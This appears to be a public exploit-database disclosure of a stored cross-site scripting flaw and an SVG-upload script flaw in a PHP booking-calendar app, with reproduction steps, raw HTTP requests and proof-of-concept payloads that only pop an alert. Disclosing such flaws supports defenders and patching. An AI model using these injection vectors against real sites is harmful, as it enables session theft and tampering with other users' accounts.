Share
## https://sploitus.com/exploit?id=PACKETSTORM:173765
# Exploit Title: Availability Booking Calendar PHP - Multiple Issues  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Tested on: Ubuntu 20.04  
# Blog: http://msecureltd.blogspot.com  
  
  
XSS #1:  
  
Steps to Reproduce:  
  
1. Browse to Bookings  
2. Select All Bookings  
3. Edit booking and select Promo Code  
4. Enter payload TEST"><script>alert(`XSS`)</script>  
  
  
// HTTP POST request  
  
POST  
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit  
HTTP/1.1  
Host: hostname  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/114.0  
[...]  
  
[...]  
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1  
[...]  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Content-Length: 205  
[...]  
  
  
  
// HTTP GET request to Bookings page  
  
GET  
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2  
HTTP/1.1  
Host: hostname  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/114.0  
[...]  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Content-Length: 33590  
[...]  
  
[...]  
<label class="control-label" for="promo_code">Promo code:</label>  
<input id="promo_code" class="form-control input-sm"  
type="text" name="promo_code" size="25"  
value="TEST"><script>alert(`XSS`)</script>" title="Promo code"  
placeholder="">  
</div>  
[...]  
  
  
  
Unrestricted File Upload #1:  
  
  
// SVG file contents  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert(`XSS`);  
</script>  
</svg>  
  
  
Steps to Reproduce:  
  
1. Browse My Account  
2. Image Browse -> Upload  
3. Then right click on image  
4. Select Open Image in New Tab  
  
  
// HTTP POST request  
  
POST  
/AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1  
HTTP/1.1  
Host: hostname  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/114.0  
[...]  
  
[...]  
-----------------------------13831219578609189241212424546  
Content-Disposition: form-data; name="img"; filename="xss.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert(`XSS`);  
</script>  
</svg>  
[...]  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Content-Length: 190  
[...]